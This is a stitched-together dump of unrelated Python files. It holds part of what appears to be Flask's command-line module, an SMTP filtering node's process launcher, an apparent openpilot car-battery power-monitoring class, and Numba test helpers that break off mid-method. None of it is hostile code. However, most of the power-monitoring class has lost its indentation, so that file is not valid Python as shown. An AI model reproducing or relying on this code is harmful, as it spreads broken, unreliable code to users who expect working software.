    for name in ('.env', '.flaskenv'):
        path = dotenv.find_dotenv(name, usecwd=True)
        if not path:
            continue
        # Remember the first file's directory; we chdir into it below.
        if new_dir is None:
            new_dir = os.path.dirname(path)
        dotenv.load_dotenv(path)
    if new_dir and os.getcwd() != new_dir:
        os.chdir(new_dir)
    return new_dir is not None  # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
    """Show extra startup messages the first time the server is run,
    ignoring the reloader.
    """
    # The reloader re-executes this process; only the original run prints.
    if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
        return

    if app_import_path is not None:
        message = ' * Serving Flask app "{0}"'.format(app_import_path)
        if not eager_loading:
            message += ' (lazy loading)'
        click.echo(message)

    click.echo(' * Environment: {0}'.format(env))
    if env == 'production':
        click.secho(
            ' WARNING: Do not use the development server in a production'
            ' environment.', fg='red')
        click.secho(' Use a production WSGI server instead.', dim=True)

    if debug is not None:
        click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
    """Click option type for the ``--cert`` option. Allows either an
    existing file, the string ``'adhoc'``, or an import for a
    :class:`~ssl.SSLContext` object.
    """
    name = 'path'
    def __init__(self):
        # Reuse click's path validation for the "existing file" case.
        self.path_type = click.Path(
            exists=True, dir_okay=False, resolve_path=True)
    def convert(self, value, param, ctx):
        """Return a path, the string 'adhoc', or an SSLContext object."""
        try:
            return self.path_type(value, param, ctx)
        except click.BadParameter:
            # Not an existing file: try "adhoc", then an import string.
            value = click.STRING(value, param, ctx).lower()
            if value == 'adhoc':
                try:
                    import OpenSSL
                except ImportError:
                    raise click.BadParameter(
                        'Using ad-hoc certificates requires pyOpenSSL.',
                        ctx, param)
                return value
            obj = import_string(value, silent=True)
            if sys.version_info < (2, 7):
                # Python 2.6 has no ssl.SSLContext; accept any import.
                if obj:
                    return obj
            else:
                if isinstance(obj, ssl.SSLContext):
                    return obj
            # Nothing matched: re-raise the original BadParameter.
            raise
def _validate_key(ctx, param, value):
    """The ``--key`` option must be specified when ``--cert`` is a file.
    Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
    """
    cert = ctx.params.get('cert')
    is_adhoc = cert == 'adhoc'
    if sys.version_info < (2, 7):
        # Python 2.6 has no ssl.SSLContext; fall back to a duck-type check.
        is_context = cert and not isinstance(cert, (text_type, bytes))
    else:
        is_context = isinstance(cert, ssl.SSLContext)
    if value is not None:
        # --key only makes sense together with a certificate *file*.
        if is_adhoc:
            raise click.BadParameter(
                'When "--cert" is "adhoc", "--key" is not used.',
                ctx, param)
        if is_context:
            raise click.BadParameter(
                'When "--cert" is an SSLContext object, "--key is not used.',
                ctx, param)
        if not cert:
            raise click.BadParameter(
                '"--cert" must also be specified.',
                ctx, param)
        # Collapse the pair into the cert parameter for run_simple().
        ctx.params['cert'] = cert, value
    else:
        # No key given: a plain certificate file is incomplete.
        if cert and not (is_adhoc or is_context):
            raise click.BadParameter(
                'Required when using "--cert".',
                ctx, param)
    return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
              help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
              help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
              help='Specify a certificate file to use HTTPS.')
@click.option('--key',
              type=click.Path(exists=True, dir_okay=False, resolve_path=True),
              callback=_validate_key, expose_value=False,
              help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
              help='Enable or disable the reloader. By default the reloader '
              'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
              help='Enable or disable the debugger. By default the debugger '
              'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
              help='Enable or disable eager loading. By default eager '
              'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
              help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
                with_threads, cert):
    """Run a local development server.
    This server is for development purposes only. It does not provide
    the stability, security, or performance of production WSGI servers.
    The reloader and debugger are enabled by default if
    FLASK_ENV=development or FLASK_DEBUG=1.
    """
    debug = get_debug_flag()
    # Reloader and debugger default to the debug flag; eager loading
    # defaults to the opposite of the reloader.
    if reload is None:
        reload = debug
    if debugger is None:
        debugger = debug
    if eager_loading is None:
        eager_loading = not reload
    show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
    # DispatchingApp defers the (possibly failing) app import so the server
    # can start and show import errors in the browser/debugger.
    app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
    from werkzeug.serving import run_simple
    run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
               threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
    """Runs an interactive Python shell in the context of a given
    Flask application. The application will populate the default
    namespace of this shell according to its configuration.
    This is useful for executing small snippets of management code
    without having to manually configure the application.
    """
    import code
    from flask.globals import _app_ctx_stack
    app = _app_ctx_stack.top.app
    banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
        sys.version,
        sys.platform,
        app.import_name,
        app.env,
        app.instance_path,
    )
    ctx = {}
    # Support the regular Python interpreter startup script if someone
    # is using it.
    startup = os.environ.get('PYTHONSTARTUP')
    if startup and os.path.isfile(startup):
        with open(startup, 'r') as f:
            # Execute the startup file in the shell's namespace.
            eval(compile(f.read(), startup, 'exec'), ctx)
    # Names from the app's shell context processors override startup names.
    ctx.update(app.make_shell_context())
    code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
    '--sort', '-s',
    type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
    default='endpoint',
    help=(
        'Method to sort routes by. "match" is the order that Flask will match '
        'routes when dispatching a request.'
    )
)
@click.option(
    '--all-methods',
    is_flag=True,
    help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
    """Show all registered routes with endpoints and methods."""
    rules = list(current_app.url_map.iter_rules())
    if not rules:
        click.echo('No routes were registered.')
        return
    # HEAD/OPTIONS are implicit on most routes; hide them unless asked.
    ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
    # "match" keeps the url_map's own ordering; others sort explicitly.
    if sort in ('endpoint', 'rule'):
        rules = sorted(rules, key=attrgetter(sort))
    elif sort == 'methods':
        rules = sorted(rules, key=lambda rule: sorted(rule.methods))
    rule_methods = [
        ', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
    ]
    headers = ('Endpoint', 'Methods', 'Rule')
    # Column widths: widest cell per column, at least the header width.
    widths = (
        max(len(rule.endpoint) for rule in rules),
        max(len(methods) for methods in rule_methods),
        max(len(rule.rule) for rule in rules),
    )
    widths = [max(len(h), w) for h, w in zip(headers, widths)]
    row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
    click.echo(row.format(*headers).strip())
    click.echo(row.format(*('-' * width for width in widths)))
    for rule, methods in zip(rules, rule_methods):
        click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
    """CLI entry point; *as_module* is True when run via ``python -m flask``."""
    args = sys.argv[1:]
    name = None
    if as_module:
        this_module = 'flask'
        # Python < 2.7 cannot run a package with -m, only a module.
        if sys.version_info < (2, 7):
            this_module += '.cli'
        name = 'python -m ' + this_module
        # Python rewrites "python -m flask" to the path to the file in argv.
        # Restore the original command so that the reloader works.
        sys.argv = ['-m', this_module] + args
    cli.main(args=args, prog_name=name)
# Support direct execution of this file ("python cli.py" / "python -m flask").
if __name__ == '__main__':
    main(as_module=True)
|
main.py | import os
from multiprocessing import Process, shared_memory
from time import sleep
from loguru import logger
from initialization_system.rabbitmq import START_RABBITMQ
from initialization_system.tarantool import START_TARANTOOL
from configuration_manager.configuration_manager import CONFIGURATION_MANAGER
from system.other import GET_CONF_FROM_MEM
from system.cleaner_manager import CLEANER_MANAGER
from system.queue_manager import QUEUE_MANAGER
from smtp_dem.smtp_dem import SMTP_DEM
from smtp_an.smtp_an import SMTP_AN
MAX_MEM_FOR_CONF = 16384 # Max byte size for data configuration
# Log destination is overridable through the LOG_NAME environment variable.
log_name = "/var/log/skyleaf.log"
if "LOG_NAME" in os.environ:
    log_name = os.environ['LOG_NAME']
# Rotate the log at 10 MB and compress rotated files.
logger.add(log_name,
           format="{time} {level} {message}",
           level="DEBUG",
           rotation="10 MB",
           compression="zip")
if __name__ == "__main__":
    # --- Initialization: backing services must be up before anything else.
    logger.info("Starting initilization.")
    if not START_TARANTOOL():
        logger.error("Tarantool is not started.")
        exit(1)
    if not START_RABBITMQ():
        logger.error("Rabbitmq is not started.")
        exit(1)

    # --- Configuration: the configuration manager publishes the current
    # config into a shared-memory segment that every child process reads.
    j_config = {'version': 0}
    shm = shared_memory.SharedMemory(create=True, size=MAX_MEM_FOR_CONF)
    address_in_mem = shm.name
    logger.info("Starting configuration manager.")
    p_conf = Process(target=CONFIGURATION_MANAGER, args=[address_in_mem, MAX_MEM_FOR_CONF])
    p_conf.start()
    sleep(10)
    # Poll shared memory until the manager has written a real config
    # (version 0 is the "not yet loaded" sentinel).
    while True:
        j_config = GET_CONF_FROM_MEM(address_in_mem)
        if j_config['version'] != 0:
            logger.info("Upload configuration successfully")
            break
        sleep(10)

    # --- Worker processes.
    logger.info("Starting cleaner manager.")
    cleaner_m = Process(target=CLEANER_MANAGER, args=[address_in_mem,])
    cleaner_m.start()

    logger.info("Starting queue manager.")
    queue_m = Process(target=QUEUE_MANAGER, args=[address_in_mem,])
    queue_m.start()

    logger.info("Starting smtpd server.")
    smtpd_server = Process(target=SMTP_DEM, args=[address_in_mem,])
    smtpd_server.start()

    logger.info("Starting smtp senders.")
    proc_active_children = []
    for num in range(j_config['system']['max_active_workers']):
        sender = Process(target=SMTP_AN, args=[address_in_mem,])
        sender.start()
        proc_active_children.append(sender)

    # --- Monitoring loop: restart any child process that has died.
    logger.info("Filtration node is ready!")
    while True:
        sleep(10)
        if not p_conf.is_alive():
            logger.info("Starting configuration manager again.")
            # BUGFIX: the restart must pass MAX_MEM_FOR_CONF exactly like the
            # initial start above; the original restarted the manager with the
            # size argument missing.
            p_conf = Process(target=CONFIGURATION_MANAGER, args=[address_in_mem, MAX_MEM_FOR_CONF])
            p_conf.start()
        if not cleaner_m.is_alive():
            logger.info("Starting cleaner manager again.")
            cleaner_m = Process(target=CLEANER_MANAGER, args=[address_in_mem,])
            cleaner_m.start()
        if not queue_m.is_alive():
            logger.info("Starting queue manager again.")
            queue_m = Process(target=QUEUE_MANAGER, args=[address_in_mem,])
            queue_m.start()
        if not smtpd_server.is_alive():
            logger.info("Starting smtpd server again.")
            smtpd_server = Process(target=SMTP_DEM, args=[address_in_mem,])
            smtpd_server.start()
        for i in range(len(proc_active_children)):
            if not proc_active_children[i].is_alive():
                logger.info("Starting smtp senders again.")
                sender = Process(target=SMTP_AN, args=[address_in_mem,])
                sender.start()
                proc_active_children[i] = sender
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600  # 30 h, matching the shutoff estimate above
MIN_ON_TIME_S = 3600  # presumably a minimum uptime before shutdown logic applies -- confirm in the consuming code
class PowerMonitoring:
  def __init__(self):
    """Initialize power-tracking state and restore the persisted car battery
    capacity estimate from the "CarBatteryCapacity" param (clamped to at
    least 1/10 of CAR_BATTERY_CAPACITY_uWh)."""
    self.params = Params()
    self.last_measurement_time = None           # Used for integration delta
    self.last_save_time = 0                     # Used for saving current value in a param
    self.power_used_uWh = 0                     # Integrated power usage in uWh since going into offroad
    self.next_pulsed_measurement_time = None
    self.car_voltage_mV = 12e3                  # Low-passed version of pandaState voltage
    self.car_voltage_instant_mV = 12e3          # Last value of pandaState voltage
    # Guards the integration state shared with calculate().
    self.integration_lock = threading.Lock()
    car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
    if car_battery_capacity_uWh is None:
      car_battery_capacity_uWh = 0
    # Reset capacity if it's low
    self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen, LEON):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10 if LEON else 3
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
support.py | """
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
# Pre-built compilation flag sets shared across the test suite.
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")  # allow fallback to object mode
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")  # always compile in object mode
no_pyobj_flags = Flags()  # plain nopython-compatible default flags
nrt_flags = Flags()
nrt_flags.set("nrt")  # enable the Numba Runtime (NRT) memory management
# Decorator used to tag tests as 'important' or 'long_running'
tag = testing.make_tag_decorator(['important', 'long_running'])
# Platform predicates used to skip parfors tests where unsupported
_windows_py27 = (sys.platform.startswith('win32') and
                 sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
class CompilationCache(object):
    """
    A cache of compilation results for various signatures and flags.
    This can make tests significantly faster (or less slow).
    """

    def __init__(self):
        self.typingctx = typing.Context()
        self.targetctx = cpu.CPUContext(self.typingctx)
        self.cr_cache = {}

    def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
        """
        Compile the function or retrieve an already compiled result
        from the cache.
        """
        from numba.targets.registry import cpu_target

        key = (func, args, return_type, flags)
        cached = self.cr_cache.get(key)
        if cached is None:
            # Register the contexts in case for nested @jit or @overload calls
            # (same as compile_isolated())
            with cpu_target.nested_context(self.typingctx, self.targetctx):
                cached = compile_extra(self.typingctx, self.targetctx, func,
                                       args, return_type, flags, locals={})
            self.cr_cache[key] = cached
        return cached
class TestCase(unittest.TestCase):
    """Base TestCase with numeric-aware assertion helpers for Numba tests."""

    longMessage = True

    # A random state yielding the same random numbers for any test case.
    # Use as `self.random.<method name>`
    @utils.cached_property
    def random(self):
        return np.random.RandomState(42)

    def reset_module_warnings(self, module):
        """
        Reset the warnings registry of a module. This can be necessary
        as the warnings module is buggy in that regard.
        See http://bugs.python.org/issue4180
        """
        if isinstance(module, str):
            module = sys.modules[module]
        try:
            del module.__warningregistry__
        except AttributeError:
            pass

    @contextlib.contextmanager
    def assertTypingError(self):
        """
        A context manager that asserts the enclosed code block fails
        compiling in nopython mode.
        """
        _accepted_errors = (errors.LoweringError, errors.TypingError,
                            TypeError, NotImplementedError)
        with self.assertRaises(_accepted_errors) as cm:
            yield cm

    @contextlib.contextmanager
    def assertRefCount(self, *objects):
        """
        A context manager that asserts the given objects have the
        same reference counts before and after executing the
        enclosed block.
        """
        old_refcounts = [sys.getrefcount(x) for x in objects]
        yield
        new_refcounts = [sys.getrefcount(x) for x in objects]
        for old, new, obj in zip(old_refcounts, new_refcounts, objects):
            if old != new:
                self.fail("Refcount changed from %d to %d for object: %r"
                          % (old, new, obj))

    @contextlib.contextmanager
    def assertNoNRTLeak(self):
        """
        A context manager that asserts no NRT leak was created during
        the execution of the enclosed block.
        """
        old = rtsys.get_allocation_stats()
        yield
        new = rtsys.get_allocation_stats()
        total_alloc = new.alloc - old.alloc
        total_free = new.free - old.free
        total_mi_alloc = new.mi_alloc - old.mi_alloc
        total_mi_free = new.mi_free - old.mi_free
        self.assertEqual(total_alloc, total_free,
                         "number of data allocs != number of data frees")
        self.assertEqual(total_mi_alloc, total_mi_free,
                         "number of meminfo allocs != number of meminfo frees")

    _bool_types = (bool, np.bool_)
    # CONSISTENCY FIX: every entry is now a proper tuple; the original had
    # bare `(utils.text_type)` and `(np.inexact)` entries, which isinstance()
    # accepts only because a lone class is also a valid second argument.
    _exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
                       (utils.text_type,)]
    _approx_typesets = [(float,), (complex,), (np.inexact,)]
    _sequence_typesets = [(tuple, list)]
    _float_types = (float, np.floating)
    _complex_types = (complex, np.complexfloating)

    def _detect_family(self, numeric_object):
        """
        This function returns a string description of the type family
        that the object in question belongs to.  Possible return values
        are: "exact", "complex", "approximate", "sequence", and "unknown"
        (also "ndarray" and "enum" for those object kinds).
        """
        if isinstance(numeric_object, np.ndarray):
            return "ndarray"

        if isinstance(numeric_object, enum.Enum):
            return "enum"

        for tp in self._sequence_typesets:
            if isinstance(numeric_object, tp):
                return "sequence"

        for tp in self._exact_typesets:
            if isinstance(numeric_object, tp):
                return "exact"

        for tp in self._complex_types:
            if isinstance(numeric_object, tp):
                return "complex"

        for tp in self._approx_typesets:
            if isinstance(numeric_object, tp):
                return "approximate"

        return "unknown"

    def _fix_dtype(self, dtype):
        """
        Fix the given *dtype* for comparison.
        """
        # Under 64-bit Windows, Numpy may return either int32 or int64
        # arrays depending on the function.
        if (sys.platform == 'win32' and sys.maxsize > 2**32 and
            dtype == np.dtype('int32')):
            return np.dtype('int64')
        else:
            return dtype

    def _fix_strides(self, arr):
        """
        Return the strides of the given array, fixed for comparison.
        Strides for 0- or 1-sized dimensions are ignored.
        """
        if arr.size == 0:
            return [0] * arr.ndim
        else:
            return [stride / arr.itemsize
                    for (stride, shape) in zip(arr.strides, arr.shape)
                    if shape > 1]

    def assertStridesEqual(self, first, second):
        """
        Test that two arrays have the same shape and strides.
        """
        self.assertEqual(first.shape, second.shape, "shapes differ")
        self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
        self.assertEqual(self._fix_strides(first), self._fix_strides(second),
                         "strides differ")

    def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
                           msg=None, ignore_sign_on_zero=False,
                           abs_tol=None
                           ):
        """
        Versatile equality testing function with more built-in checks than
        standard assertEqual().

        For arrays, test that layout, dtype, shape are identical, and
        recursively call assertPreciseEqual() on the contents.
        For other sequences, recursively call assertPreciseEqual() on
        the contents.
        For scalars, test that two scalars or have similar types and are
        equal up to a computed precision.
        If the scalars are instances of exact types or if *prec* is
        'exact', they are compared exactly.
        If the scalars are instances of inexact types (float, complex)
        and *prec* is not 'exact', then the number of significant bits
        is computed according to the value of *prec*: 53 bits if *prec*
        is 'double', 24 bits if *prec* is single.  This number of bits
        can be lowered by raising the *ulps* value.
        ignore_sign_on_zero can be set to True if zeros are to be considered
        equal regardless of their sign bit.
        abs_tol if this is set to a float value its value is used in the
        following. If, however, this is set to the string "eps" then machine
        precision of the type(first) is used in the following instead. This
        kwarg is used to check if the absolute difference in value between first
        and second is less than the value set, if so the numbers being compared
        are considered equal. (This is to handle small numbers typically of
        magnitude less than machine precision).

        Any value of *prec* other than 'exact', 'single' or 'double'
        will raise an error.
        """
        try:
            self._assertPreciseEqual(first, second, prec, ulps, msg,
                                     ignore_sign_on_zero, abs_tol)
        except AssertionError as exc:
            failure_msg = str(exc)
            # Fall off of the 'except' scope to avoid Python 3 exception
            # chaining.
        else:
            return
        # Decorate the failure message with more information
        self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))

    def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
                            msg=None, ignore_sign_on_zero=False,
                            abs_tol=None):
        """Recursive workhorse for assertPreciseEqual()."""

        def _assertNumberEqual(first, second, delta=None):
            if (delta is None or first == second == 0.0
                or math.isinf(first) or math.isinf(second)):
                self.assertEqual(first, second, msg=msg)
                # For signed zeros
                if not ignore_sign_on_zero:
                    try:
                        if math.copysign(1, first) != math.copysign(1, second):
                            self.fail(
                                self._formatMessage(msg,
                                                    "%s != %s" %
                                                    (first, second)))
                    except TypeError:
                        pass
            else:
                self.assertAlmostEqual(first, second, delta=delta, msg=msg)

        first_family = self._detect_family(first)
        second_family = self._detect_family(second)

        assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
                                                                  second_family)
        if msg:
            assertion_message += ': %s' % (msg,)
        self.assertEqual(first_family, second_family, msg=assertion_message)

        # We now know they are in the same comparison family
        compare_family = first_family

        # For recognized sequences, recurse
        if compare_family == "ndarray":
            dtype = self._fix_dtype(first.dtype)
            self.assertEqual(dtype, self._fix_dtype(second.dtype))
            self.assertEqual(first.ndim, second.ndim,
                             "different number of dimensions")
            self.assertEqual(first.shape, second.shape,
                             "different shapes")
            self.assertEqual(first.flags.writeable, second.flags.writeable,
                             "different mutability")
            # itemsize is already checked by the dtype test above
            self.assertEqual(self._fix_strides(first),
                             self._fix_strides(second), "different strides")
            if first.dtype != dtype:
                first = first.astype(dtype)
            if second.dtype != dtype:
                second = second.astype(dtype)
            for a, b in zip(first.flat, second.flat):
                self._assertPreciseEqual(a, b, prec, ulps, msg,
                                         ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "sequence":
            self.assertEqual(len(first), len(second), msg=msg)
            for a, b in zip(first, second):
                self._assertPreciseEqual(a, b, prec, ulps, msg,
                                         ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "exact":
            exact_comparison = True

        elif compare_family in ["complex", "approximate"]:
            exact_comparison = False

        elif compare_family == "enum":
            self.assertIs(first.__class__, second.__class__)
            self._assertPreciseEqual(first.value, second.value,
                                     prec, ulps, msg,
                                     ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "unknown":
            # Assume these are non-numeric types: we will fall back
            # on regular unittest comparison.
            self.assertIs(first.__class__, second.__class__)
            exact_comparison = True

        else:
            assert 0, "unexpected family"

        # If a Numpy scalar, check the dtype is exactly the same too
        # (required for datetime64 and timedelta64).
        if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
            self.assertEqual(first.dtype, second.dtype)

        # Mixing bools and non-bools should always fail
        if (isinstance(first, self._bool_types) !=
            isinstance(second, self._bool_types)):
            assertion_message = ("Mismatching return types (%s vs. %s)"
                                 % (first.__class__, second.__class__))
            if msg:
                assertion_message += ': %s' % (msg,)
            self.fail(assertion_message)

        try:
            if cmath.isnan(first) and cmath.isnan(second):
                # The NaNs will compare unequal, skip regular comparison
                return
        except TypeError:
            # Not floats.
            pass

        # if absolute comparison is set, use it
        if abs_tol is not None:
            # NOTE: this is an *absolute* tolerance (the local used to be
            # misleadingly named `rtol`).
            if abs_tol == "eps":
                tol = np.finfo(type(first)).eps
            elif isinstance(abs_tol, float):
                tol = abs_tol
            else:
                raise ValueError("abs_tol is not \"eps\" or a float, found %s"
                                 % abs_tol)
            if abs(first - second) < tol:
                return

        exact_comparison = exact_comparison or prec == 'exact'

        # SIMPLIFICATION: `exact_comparison` already accounts for
        # prec == 'exact' (set just above), so the extra prec check the
        # original carried here was redundant.
        if not exact_comparison:
            if prec == 'single':
                bits = 24
            elif prec == 'double':
                bits = 53
            else:
                raise ValueError("unsupported precision %r" % (prec,))
            k = 2 ** (ulps - bits - 1)
            delta = k * (abs(first) + abs(second))
        else:
            delta = None

        if isinstance(first, self._complex_types):
            _assertNumberEqual(first.real, second.real, delta)
            _assertNumberEqual(first.imag, second.imag, delta)
        elif isinstance(first, (np.timedelta64, np.datetime64)):
            # Since Np 1.16 NaT == NaT is False, so special comparison needed
            if numpy_support.version >= (1, 16) and np.isnat(first):
                self.assertEqual(np.isnat(first), np.isnat(second))
            else:
                _assertNumberEqual(first, second, delta)
        else:
            _assertNumberEqual(first, second, delta)

    def run_nullary_func(self, pyfunc, flags):
        """
        Compile the 0-argument *pyfunc* with the given *flags*, and check
        it returns the same result as the pure Python function.
        The got and expected results are returned.
        """
